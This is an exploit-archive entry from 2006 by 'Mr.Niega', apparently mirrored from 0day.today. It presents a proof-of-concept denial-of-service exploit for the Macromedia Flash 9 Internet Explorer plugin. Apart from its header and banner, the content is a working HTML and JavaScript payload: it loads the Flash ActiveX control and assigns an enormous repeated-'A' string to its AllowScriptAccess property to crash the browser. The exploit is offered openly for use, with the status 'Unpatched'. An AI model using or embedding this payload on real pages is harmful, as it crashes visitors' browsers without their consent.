id: 6191
date: 08/17/2006
title: Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit
author: Mr.Niega
cves: 

=====================================================================
Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit
=====================================================================



/*
*
* Macromedia flash crash
* Bug discovered by Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Flash 9 (Ie Plugin)
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: MarjinZ@gmail.com
* Credits goes out to MarjinZ
*
*                                        
*    /|    //| |              /|    //| |
*   //|   // | |      __     //|   // | |
*  // |  //  | |   //   ) ) // |  //  | |
* //  | //   | |  //   / / //  | //   | |
*//   |//    | | //   / / //   |//    | |
*
*
*/

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="allo">
</object>
<script>
var A = 'A';
while (A.length <= 51512*512) A+=A;
allo.AllowScriptAccess = A;
</script>



#  0day.today [2023-03-22]  #